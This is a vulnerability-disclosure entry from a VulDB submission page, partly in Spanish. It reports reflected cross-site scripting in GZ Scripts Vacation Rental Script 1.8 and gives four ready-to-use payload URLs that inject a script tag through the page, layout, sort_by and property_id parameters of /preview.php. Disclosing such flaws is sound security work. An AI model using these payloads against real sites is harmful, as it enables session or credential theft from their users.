Enviar #175868: Vacation Rental Script 1.8 - Reflected XSSinformación

TítuloVacation Rental Script 1.8 - Reflected XSS
DescripciónAuthor : skalvin aka (CraCkEr) Date : 29/06/2023 Website : https://gzscripts.com/php-vacation-rental-script.html Vendor : GZ Scripts Software : Vacation Rental Script 1.8 Vuln Type: Reflected XSS Impact : Manipulate the content of the site Release Notes: The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /preview.php GET 'page' parameter is vulnerable to RXSS https://website/preview.php?&page=m47wf%22%3e%3cscript%3ealert(1)%3c%2fscript%3el35t9&sort_by=date Path: /preview.php GET 'layout' parameter is vulnerable to RXSS https://website/preview.php?layout=gridbhclb%22%3e%3cscript%3ealert(1)%3c%2fscript%3er8p4d Path: /preview.php GET 'sort_by' parameter is vulnerable to RXSS https://website/preview.php?&page=1&sort_by=bg8c8%22%3e%3cscript%3ealert(1)%3c%2fscript%3elbm07 Path: /preview.php GET 'property_id' parameter is vulnerable to RXSS https://website/preview.php?controller=GzFront&action=detail&property_id=1nob9z%22%3e%3cscript%3ealert(1)%3c%2fscript%3evts7c [-] Done
Usuario
 skalvin (UID 49463)
Sumisión2023-06-29 19:22 (hace 3 años)
Moderación2023-07-08 13:49 (9 days later)
EstadoAceptado
Entrada de VulDB233349 [GZ Scripts PHP Vacation Rental Script 1.8 /preview.php page/layout/sort_by/property_id secuencias de comandos en sitios cruzados]
Puntos17

AnteriorVisión De ConjuntoPróximo

Want to know what is going to be exploited?

We predict KEV entries!